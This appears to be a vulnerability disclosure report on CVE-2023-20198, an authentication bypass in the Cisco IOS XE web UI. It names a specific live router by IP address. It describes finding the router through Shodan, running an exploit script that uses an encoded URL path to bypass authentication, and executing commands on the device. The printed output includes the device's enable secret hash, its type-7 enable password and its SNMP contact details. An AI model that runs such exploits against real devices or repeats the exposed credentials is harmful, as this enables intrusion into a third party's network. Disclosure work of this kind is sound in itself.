Cisco IOS XE instance at 41.208.24.174 vulnerable to CVE-2023-20198

## Summary: CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the webui_wsma_http web endpoint without requiring authentication. By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS root user to facilitate implantation. This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints: The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag. The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC. ## Proof On Concepts : See below for an example request that bypasses authentication on vulnerable instances of IOS-XE. This POC creates a user named baduser with privilege level 15. Let’s dig into the details. {F3672631} 1. Sign in as any user shodan query 1. Visit Searchbar and Search Query `org: "MTN Innovation Centre"` 1. Found domain owned by MTN Cameroon as `41.208.24.174` 1. Intercept url to burp-suite and sent to repeater 1. Sent to intruder and Set up the [exploits here](https://gist.github.com/functionofpwnosec/aa4ef339aafab346eecbf78522055c31) 1. Run exploits bellow command ```bash exploit.py -t 41.208.24.174 -c Testing for vulnerability Target IP: 41.208.24.174 Target URL: http://41.208.24.174/%2577eb%2575i_%2577sma_Http Vulnerable: True IOS Ver: ISR4331/K9 europ-constantia-2 IOS 16.6 Cisco IOS Software [Everest], ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.6.4, RELEASE SOFTWARE (fc3) Done. ``` ```bash exploit.py -t 41.208.24.174 -g Selected Target: 41.208.24.174 Running in Exec Mode Executing Command: sh run Sending exploit to target URL: http://41.208.24.174/%2577eb%2575i_%2577sma_Http Building configuration... Current configuration : 17326 bytes ``` ```bash enable secret 5 $1$vF3Q$wplcifyib3DUyzbgcUGe/1 enable password 7 1214041E1E snmp-server trap-source GigabitEthernet0/0/0.3029 snmp-server source-interface informs GigabitEthernet0/0/0.3029 snmp-server contact [email protected] 0860110860 ``` and you can see all the sensitive for configuration was exposed {F3672637} {F3672640} {F3672642} ## Supporting Material/References: * [Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z) * [horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/) * [horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/) * [LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/) ## Impact Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system.